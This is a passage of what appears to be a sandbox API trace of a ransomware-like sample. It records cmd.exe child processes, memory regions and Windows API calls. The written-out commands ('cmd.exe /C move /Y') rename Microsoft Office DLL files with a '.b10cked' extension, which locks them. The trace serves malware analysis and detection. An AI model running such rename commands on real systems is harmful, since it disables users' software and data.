SetErrorMode (uMode=0x0) returned 0x0 [0153.190] SetErrorMode (uMode=0x1) returned 0x0 [0153.190] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", nBufferLength=0x104, lpBuffer=0x18eec0, lpFilePart=0x18ec58 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", lpFilePart=0x18ec58*="GRINTL~2.TRX") returned 0x3c [0153.190] SetErrorMode (uMode=0x0) returned 0x1 [0153.190] SetErrorMode (uMode=0x0) returned 0x0 [0153.190] SetErrorMode (uMode=0x1) returned 0x0 [0153.190] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18f0c8, lpFilePart=0x18ec58 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x18ec58*="GRINTL32.REST.trx_dll.b10cked") returned 0x4d [0153.190] SetErrorMode (uMode=0x0) returned 0x1 [0153.190] SetLastError (dwErrCode=0x0) [0153.190] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll.b10cked")) returned 0xffffffff [0153.191] GetLastError () returned 0x2 [0153.191] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x18e5d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18e5d4) returned 0x1c2138 [0153.191] FindNextFileW (in: hFindFile=0x1c2138, lpFindFileData=0x18e5d4 | out: lpFindFileData=0x18e5d4) returned 0 [0153.191] GetLastError () returned 0x12 [0153.191] FindClose (in: hFindFile=0x1c2138 | out: hFindFile=0x1c2138) returned 1 [0153.192] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL~2.TRX", fInfoLevelId=0x1, lpFindFileData=0x1c1cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1c1cc8) returned 0x1c2138 [0153.193] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0153.193] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0153.193] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll")) returned 0x2020 [0153.193] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\GRINTL32.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\grintl32.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0153.193] FindClose (in: hFindFile=0x1c2138 | out: hFindFile=0x1c2138) returned 1 [0153.194] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e820 | out: _Buffer=" 1") returned 9 [0153.194] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.194] GetFileType (hFile=0x7) returned 0x2 [0153.230] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0153.230] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e7ac | out: lpMode=0x18e7ac) returned 1 [0153.230] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.230] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e7e0 | out: lpConsoleScreenBufferInfo=0x18e7e0) returned 1 [0153.230] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0153.231] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e820 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0153.231] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e804, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e804*=0x1a) returned 1 [0153.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.231] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.231] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.231] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.231] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.231] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.231] SetConsoleInputExeNameW () returned 0x1 [0153.231] GetConsoleOutputCP () returned 0x1b5 [0153.232] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.232] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.232] exit (_Code=0) Process: id = "253" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16a20" os_pid = "0xd6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 20727 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 20728 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 20729 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 20730 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 20731 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 20732 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 20733 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 20734 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 20735 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 20736 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 20798 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 20799 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 20800 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 20801 start_va = 0xe0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 20802 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 20803 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 20804 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 20805 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 20806 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 20807 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 20808 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 20809 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 20810 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 20811 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 20812 start_va = 0x3d0000 end_va = 0x497fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 20813 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 20814 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 20815 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 20816 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 20817 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 20818 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 20819 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 20820 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 20821 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 316 os_tid = 0xe94 [0153.473] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fea4 | out: lpSystemTimeAsFileTime=0x20fea4*(dwLowDateTime=0x95694d80, dwHighDateTime=0x1d440a9)) [0153.473] GetCurrentProcessId () returned 0xd6c [0153.473] GetCurrentThreadId () returned 0xe94 [0153.473] GetTickCount () returned 0x2f46c [0153.473] QueryPerformanceCounter (in: lpPerformanceCount=0x20fe9c | out: lpPerformanceCount=0x20fe9c*=21026218833) returned 1 [0153.474] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0153.474] __set_app_type (_Type=0x1) [0153.474] __p__fmode () returned 0x76b331f4 [0153.474] __p__commode () returned 0x76b331fc [0153.474] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0153.474] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0153.474] GetCurrentThreadId () returned 0xe94 [0153.474] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe94) returned 0x38 [0153.474] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0153.474] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0153.474] SetThreadUILanguage (LangId=0x0) returned 0x409 [0153.475] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0153.475] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fe34 | out: phkResult=0x20fe34*=0x0) returned 0x2 [0153.475] VirtualQuery (in: lpAddress=0x20fe6b, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0153.475] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fe04, dwLength=0x1c | out: lpBuffer=0x20fe04*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0153.475] GetConsoleOutputCP () returned 0x1b5 [0153.475] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.475] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0153.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.475] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0153.475] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.475] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0153.476] _get_osfhandle (_FileHandle=1) returned 0x7 [0153.476] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0153.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.476] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0153.476] _get_osfhandle (_FileHandle=0) returned 0x3 [0153.476] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0153.476] GetEnvironmentStringsW () returned 0x2e0210* [0153.476] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0153.477] GetEnvironmentStringsW () returned 0x2e0210* [0153.477] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0153.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eda4 | out: phkResult=0x20eda4*=0x40) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0xa0, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x0, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegCloseKey (hKey=0x40) returned 0x0 [0153.477] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20eda4 | out: phkResult=0x20eda4*=0x40) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x40, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x1, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x0, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x9, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.477] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x4, lpData=0x20edb0*=0x9, lpcbData=0x20eda8*=0x4) returned 0x0 [0153.478] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20edac, lpData=0x20edb0, lpcbData=0x20eda8*=0x1000 | out: lpType=0x20edac*=0x0, lpData=0x20edb0*=0x9, lpcbData=0x20eda8*=0x1000) returned 0x2 [0153.478] RegCloseKey (hKey=0x40) returned 0x0 [0153.478] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88637c [0153.478] srand (_Seed=0x5b88637c) [0153.478] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"" [0153.478] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIRD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\MAPIR.DLL.trx_dll.b10cked\"" [0153.478] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.478] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0153.478] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0153.478] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0153.478] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.478] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0153.479] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0153.479] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0153.479] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0153.479] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0153.479] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0153.479] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0153.479] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0153.479] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0153.479] GetEnvironmentStringsW () returned 0x2e2360* [0153.479] FreeEnvironmentStringsW (penv=0x2e2360) returned 1 [0153.479] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0153.479] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0153.479] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0153.479] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0153.479] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0153.479] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0153.479] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0153.479] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0153.479] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0153.479] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0153.479] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20fb70 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.479] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20fb70, lpFilePart=0x20fb6c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20fb6c*="Desktop") returned 0x18 [0153.479] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.480] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f8ec | out: lpFindFileData=0x20f8ec) returned 0x2e09f0 [0153.480] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0153.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f8ec | out: lpFindFileData=0x20f8ec) returned 0x2e09f0 [0153.480] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0153.480] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f8ec | out: lpFindFileData=0x20f8ec) returned 0x2e09f0 [0153.480] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0153.480] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0153.480] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0153.480] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0153.481] GetEnvironmentStringsW () returned 0x2e0210* [0153.481] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0153.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0153.481] GetConsoleOutputCP () returned 0x1b5 [0153.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0153.481] GetUserDefaultLCID () returned 0x409 [0153.482] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0153.482] GetLocaleInfoW (in: Locale=0x409, 